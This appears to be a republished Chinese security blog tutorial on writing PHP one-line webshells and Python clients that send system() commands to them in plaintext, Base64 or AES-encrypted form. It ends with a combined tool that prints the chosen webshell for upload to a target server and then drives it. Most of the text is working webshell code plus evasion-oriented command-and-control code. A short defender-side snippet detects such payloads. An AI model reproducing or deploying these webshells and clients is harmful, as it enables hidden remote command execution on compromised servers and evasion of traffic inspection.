Connecting to a PHP Webshell with Python: Encrypted Data Transfer

admin · 2022-06-27 07:52:50

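Statement: Most articles on this public account come from the author's daily study notes; some are reposted with the author's authorization or through other public accounts' whitelists. Reposting without authorization is strictly prohibited. To repost, contact 刘一手.
Do not use the techniques in this article for illegal testing. The author and this public account bear no responsibility for any adverse consequences that result.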

Environment

phpstudy, Python 3.8

1. Plain webshell data transfer

Create a file named webshell.php containing a one-line webshell:

<?php @eval($_POST['pass']);?>

Write a sender/receiver client in Python:

import requests

url = input('webshell_url:')
pwd = input('webshell_pwd:')
# Route requests through the local Burp proxy so the traffic can be inspected
proxy = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080'
}
while True:
    cmd = input('$')
    if cmd == 'exit':
        exit()
    # The command is wrapped in a PHP system() call and sent as-is
    send = "system('" + cmd + "');"
    data = {pwd: send}
    r = requests.post(url=url, data=data, proxies=proxy)
    print(r.text)

Running it and capturing the request in Burp shows that the data is transmitted raw, without any encryption.

2. Base64-encoded data transfer

Create a file named webshell.php with the following content:

<?php @eval(base64_decode($_POST['pass']));?>

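Write a sender/receiver client in Python:

import requests, base64

url = input('webshell_url:')
pwd = input('webshell_pwd:')
# Route requests through the local Burp proxy so the traffic can be inspected
proxy = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080'
}
while True:
    cmd = input('$')
    if cmd == 'exit':
        exit()
    send = "system('" + cmd + "');"
    # Base64-encode the PHP statement before sending it
    base64_send = base64.b64encode(send.encode('utf-8'))
    data1 = {pwd: base64_send}
    r = requests.post(url=url, data=data1, proxies=proxy)
    print(r.text)

Running it and capturing the request in Burp shows that the transmitted data is Base64-encoded. Base64 is an encoding rather than encryption, so anyone who sees the request can recover the payload by decoding it.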

3. AES-encrypted data transfer

Create a file named webshell.php with the following content:

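<?php
// Key and IV are hard-coded and must match the values in the Python client
$key='woshinibaba66666';
$vi='nishiwoerzi66666';
$rce=openssl_decrypt(base64_decode($_POST['pass']), "AES-128-CBC",$key,OPENSSL_RAW_DATA,$vi);
// $rec is undefined and $cmd is never used, so this line has no effect
$cmd=base64_decode($rec);
@eval($rce);
?>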

Write a sender/receiver client in Python:

import requests, base64
from Crypto.Cipher import AES

BLOCK_SIZE = 16
# PKCS#7-style padding to a multiple of the AES block size
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
# Static key and IV shared with webshell.php
key = 'woshinibaba66666'
vi = 'nishiwoerzi66666'

def AES_Encrypt(key, data):
    data = pad(data)
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
    encryptedbytes = cipher.encrypt(data.encode('utf8'))
    encodestrs = base64.b64encode(encryptedbytes)
    enctext = encodestrs.decode('utf8')
    return enctext

def AES_Decrypt(key, data):
    data = data.encode('utf8')
    encodebytes = base64.decodebytes(data)
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
    text_decrypted = cipher.decrypt(encodebytes)
    text_decrypted = unpad(text_decrypted)
    text_decrypted = text_decrypted.decode('utf8')
    print(text_decrypted)
    return text_decrypted

if __name__ == '__main__':
    url = input('webshell_url:')
    pwd = input('webshell_pwd:')
    # Route requests through the local Burp proxy so the traffic can be inspected
    proxy = {
        'http': '127.0.0.1:8080',
        'https': '127.0.0.1:8080'
    }
    while True:
        cmd = input('$')
        if cmd == 'exit':
            exit()
        send = "system('" + cmd + "');"
        data1 = {pwd: AES_Encrypt(key, send)}
        r = requests.post(url=url, data=data1, proxies=proxy)
        print(r.text)

Running it, capturing the request in Burp and pasting the captured value into an online AES decryption tool confirms that the transmitted data is AES-CBC encrypted.

Online decryption tool: http://tool.chacuo.net/cryptaes
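Seen from the defender's side, the three transports above leave different traces in the POST body. The following is an added example, not code from the original article: it labels the form fields of a request body as plaintext PHP, Base64-wrapped PHP, or binary data in whole 16-byte blocks. The indicator list, the 0.7 threshold and the sample bodies are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlencode

# Assumed indicator list: PHP calls typical of a command payload.
PHP_CALL = re.compile(r"\b(system|eval|exec|shell_exec|passthru|assert)\s*\(", re.I)

def printable_ratio(raw: bytes) -> float:
    return sum(32 <= b < 127 for b in raw) / len(raw)

def classify_value(value: str) -> str:
    """Label one form value according to the three transports on this page."""
    if PHP_CALL.search(value):
        return "plaintext-php"            # section 1: raw code in the body
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "other"
    if not raw:
        return "other"
    if PHP_CALL.search(raw.decode("utf-8", errors="ignore")):
        return "base64-php"               # section 2: decodes to code
    # section 3: binary, whole 16-byte blocks, as AES-CBC output would be
    if len(raw) % 16 == 0 and printable_ratio(raw) < 0.7:
        return "block-cipher-like"
    return "other"

def classify_body(body: str) -> list:
    """Return (parameter, label) for every suspicious field of a POST body."""
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        label = classify_value(value)
        if label != "other":
            hits.append((name, label))
    return hits

def b64(data: bytes) -> str:
    return base64.b64encode(data).decode()

# Constructed sample bodies (not captured traffic). FAKE_CT is arbitrary
# bytes standing in for ciphertext, not output produced with the page's key.
FAKE_CT = bytes.fromhex("9f3c07e1b24d88a6f05b13c97e2ad4610be58c74d1a63f92c8175eb04a69f3d2")
SAMPLES = [
    urlencode({"user": "alice", "comment": "hello world"}),
    urlencode({"pass": "system('whoami');"}),
    urlencode({"pass": b64(b"system('whoami');")}),
    urlencode({"pass": b64(FAKE_CT)}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify_body(body))
```

The block-cipher-like label is a heuristic: any Base64 binary field whose decoded length is a multiple of 16 bytes matches, so it is most useful when correlated with a PHP endpoint that normally receives no such field.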

Combined code

import requests, base64
from Crypto.Cipher import AES

BLOCK_SIZE = 16
# PKCS#7-style padding to a multiple of the AES block size
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
# Static key and IV shared with the AES variant of webshell.php
key = 'woshinibaba66666'
vi = 'nishiwoerzi66666'

def AES_Encrypt(key, data):
    data = pad(data)
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
    encryptedbytes = cipher.encrypt(data.encode('utf8'))
    encodestrs = base64.b64encode(encryptedbytes)
    enctext = encodestrs.decode('utf8')
    return enctext

def AES_Decrypt(key, data):
    data = data.encode('utf8')
    encodebytes = base64.decodebytes(data)
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
    text_decrypted = cipher.decrypt(encodebytes)
    text_decrypted = unpad(text_decrypted)
    text_decrypted = text_decrypted.decode('utf8')
    print(text_decrypted)
    return text_decrypted

if __name__ == '__main__':
    # Menu: 1 = plain transfer, 2 = Base64 transfer, 3 = AES transfer
    print('----------------')
    print('|1:普通传输 |\n|2:base64加密传输|\n|3:AES加密传输 |')
    print('----------------')
    print('说明:选择生成对应的webshell传到目标服务器')
    use = input('[+] choice:')
    # Print the webshell that matches the chosen transport
    if use == '1':
        print("""<?php @eval($_POST['pass']);?>""")
    if use == '2':
        print("""<?php @eval(base64_decode($_POST['pass']));?>""")
    if use == '3':
        print("""<?php $key='woshinibaba66666';$vi='nishiwoerzi66666';$rce=openssl_decrypt(base64_decode($_POST['pass']), "AES-128-CBC",$key,OPENSSL_RAW_DATA,$vi);$cmd=base64_decode($rec);@eval($rce);?>""")
    con = input('[+] continue(yes/no):')
    if con == 'no':
        exit()
    if con == 'yes':
        url = input('[+] webshell_url:')
        pwd = 'pass'
        while True:
            data = ''
            cmd = input('[-] $:')
            if cmd == 'exit':
                exit()
            send = "system('" + cmd + "');"
            # Encode the statement according to the chosen transport
            if use == '1':
                data = {pwd: send}
            if use == '2':
                base64_send = base64.b64encode(send.encode('utf-8'))
                data = {pwd: base64_send}
            if use == '3':
                AES_send = AES_Encrypt(key, send)
                data = {pwd: AES_send}
            r = requests.post(url=url, data=data)
            print(r.text)

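Originally published on the WeChat public account 鹏组安全 under the title "Connecting to a PHP Webshell with Python: Encrypted Data Transfer".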
